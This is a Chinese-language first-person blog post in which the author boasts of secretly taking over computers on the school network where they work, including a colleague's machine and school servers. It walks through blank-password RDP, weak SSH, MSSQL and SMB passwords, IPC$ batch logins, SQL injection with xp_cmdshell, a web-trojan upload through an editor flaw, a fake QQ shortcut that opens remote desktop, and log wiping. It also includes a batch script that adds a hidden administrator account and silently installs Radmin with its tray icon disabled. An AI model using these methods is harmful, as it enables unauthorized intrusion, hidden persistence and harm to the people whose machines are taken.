内网肉鸡大追捕

首先，我先介绍一下我所处的环境．本人所在的是一个非工科院校工作，这边的安全意思比较薄弱，这给我提供了很大的发展肉鸡的空间．
　　接着介绍一下，这里的网络
　　这边的网络地址分为两类：分别是
　　１７２．１８．Ａ．＊（Ａ小于１０的基本上学校的服务器，其他属于教学办公的机器）
　　１７２．１６．＊．＊（属于学生公寓的机器）
　　不同的楼层之间做了,端口过滤，如１３９，４４５这些敏感的端口全部被过滤了，这个对想抓肉鸡的人是个不小的打击．
　　言归正传，现在开始追捕行动．
１．３３８９空口令
　　考虑到现在很多机器都是用xp的，很多机器都是开着３３８９的，虽然打过补丁的机器都无法用空口令登陆，但是还是有部分可以使用的．
　　对教学区和公寓分别实施两套策略
　　教学区机器在线率最高的是在中午的时候，而学生公寓区往往在晚上１０点半左右．在这个时候我会打开xscan，填上３３８９端口，自己先去喝杯茶，到别的地方侃两下．
　扫描结束后，把主机列表成一个文件．这样分别进行两次，已经有大量的肉鸡后选名单了．接下来制定登陆的策略．
　　教学办公区这边选一个一般是吃饭的时间，然后用administrator空口令登陆
　　学生公寓区是在中午吃饭的时间和下午上课以后，有学生会选择在这段时间挂机的．
　　发现，有不少机器可以用空口令登陆的．教师这边机器能登陆的机器不多，因为补丁都打上了，尽管有很多空口令的，也只能放弃了．学生那么虽然可以登陆的不少，他们基本上都在操作中，无法下手，遇到运气到家时候，赶紧用administrator或当前帐户登陆，开启telnet
　接着，哈哈....
　　经过这短时间的搜捕，共积累６只肉鸡左右，当然，我完全可以通过这种手段扩大肉鸡，但是这种实在是太重复单调了．
　２．ssh
　学校的路由器和交换机都有acl控制的，想通过他们渗透是不行的．所以２３端口，我基本上都不扫描．所以就把ssh端口扫描了一下，很快发现了一台ssh密码为１２３４５的linux主机，马上用ssh登陆器上去，开后门，除日志，呵呵，这是我唯一一台linux肉鸡．呵呵,想起无间道里面的一句话,撑哥,他是我唯一的小弟
　３．通过已经获得的肉鸡进行扩大战果
　首先想通过在肉鸡上安装sniffer，感觉太麻烦，而且容易被发现，怎么办了
   顺便说一下，有一次，好象被发现了
　那次我开了telnet和radmin的
　那个家伙关掉telnet，然后把硬盘除c盘以外的一个一个的格了，我在用radmin看着他干完．
试试ipc，很古董的东西了，呵呵
　首先，扫描目标网段存活的机器，然后生成列表
　然后，自己作个小程序
　生成以下形式的bat文件
　echo >>c:\windows\log1.txt　
  net use \\ip\admin$ "" /user :administrator　　>>c:\windows\log1.txt
在目标机器上执行
事实上，这种方法成功率并不高
　通过这种方法，我也只捕获两只肉鸡．
４．ccproxy
　我发现学校里面还有些机器是在用这个服务程序上网的，好telnet　上去看看服务程序版本，６．x，看来不能做溢出了．但是可以做远程执行exe
　到黑基上down一个ccpropingxp，执行后，目标会到网络上下一个exe并执行，搞定了吧．碰到有些机器开启了xp自带的放火墙的还要编程修改注册表里面相应的参数，exe遍好后，放到网络上，接着，嘿嘿
搞定两台后，转战别的方向．
５．mssql弱口令
还是用xcsan，居然一下发现两台，一台居然是学校某部门服务器群里面的一台，还开了３３８９，二话不说拿下，看看是２０００的，用findpass找出口令，用工程学的原理．尝试登陆该群里面的其他机器，ok，一下子爆出５台机器．爽透了．
另外一台机器也是两千的，装的是norton杀毒的，上传nc，拿回一个shell，为所欲为吧，哈哈．
看来有所作为，挂上强一点的字典，ok对扫描到开１４３３的机器进行爆破．
爆出一台
是学校的服务器的，晕到，禁地，但是还要试试
用sql利用工具连上，dos命令，错误,正常，看来xp＿cmdshell被删了
恢复，还是不行
看看他还开了什么端口，radmin
哦也
删除radmin那几个键就可以自己登陆了，哈哈
还是用sql利用工具连上，注册表管理，晕，读到radmin子键的时候出错．
算了，用自己的mssql服务器直接连上去，调出mssql，查询分析器，噼里啪啦，打进代码，访问被拒绝，看看sa的权限，sysadmin，看来sa与系统权限分离了．
还是尝试倍份数据库为asp吧
找到网站目录，倍份asp
６，同个楼层的渗透．
（１）
同一个楼层是没有做端口过滤的，呵呵
　首先，找到ip的范围，接着在xcsan里面狂扫一通，ok，先去晒晒太阳．回来一看，好家伙两台肉鸡，搞定，装上radmin，日志不打扫了，８８走人．
　下午的时候，办公室的同事突然拉住我说，指着电脑说，这个图标是什么东东
　晕倒，原来同事成了我的肉鸡，radmin忘了禁止掉图标，赶紧清理，呵呵．为时已晚，同事第二天就上了防火墙，呵呵．

（２）smbcrack
对象当然是win2000了
先用xcan扫描，用superdic生成字典,接着挂上字典，搞定２台．

(3)    扫描共享
xscan 扫描
晕,有桌面共享的
have a look
有word,excel,嘿嘿
下手的地方不少,为了不妨碍办公,还是决定不在word做手脚
qq快捷方式,嘿嘿,查看xscan扫描出来的信息
大致能判断出当前的用户的信息
直接写一个程序,用qq的图标,编译好后放入桌面的一个文件夹里面,位置要隐蔽,狸猫唤太子,嘿嘿,替换了qq的快捷方式
程序功能为开3389,建立帐户,够了吧
然后通过查看qq的快捷方式我知道qq在####位置里面
所以,我的程序最后会启动qq,
嘿嘿
７．考试系统的渗透
学校里面很多部门用一个考试系统，这个系统自带了一个appache和mysql
嘿嘿，要是知道mysql的密码，那么....
到网上down了一个程序下来，研究.......，嘿嘿

８．sql　inject

打开xscan，添如８０端口，闭上眼睛休息一下．找到n多机器，凭着经验，打开一个学校网站，打开一个网页，在网址后面加上'出错，加上　and　１＝１
成功，ok
马上打开小明子查看一下，是mssql的
呵呵
但是mssql的端口为什么没有扫描到呢,看来在防火墙上做过滤了
学校的服务器还是有点不一样
我尝试着搜索xp＿cmdshell是否存在，ok，看到了
接着添加用户，嘿嘿，还开了３３８９的,感激中.....

９．网页上传

看到一台机器，居然可以浏览web文件夹的
于是大肆搜索一翻，看到了nb文章系统，版本还比较新，进入后台没什么用的．
不是有NB文章系统Fck_editor的漏洞利用
上传海洋远端木马
上传radmin
自己又制作了一个bat
net user  iuser_sql /add  ％％％％
net localgroup administrators  iuser_sql /add  
r_server /install /silence
r_server /pass:％％％％ /save /silence
reg add HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 01000000
net start r_server
然后做一个小程序，无声无息的启动这个bat，放入启动项目，嘿嘿


１０．溢出
很遗憾，没有成功溢出过什么东东


但是失败的例子也很多，在这里，就不说了，呵呵
希望以上的小菜思路，对和我一样的菜鸟有些帮助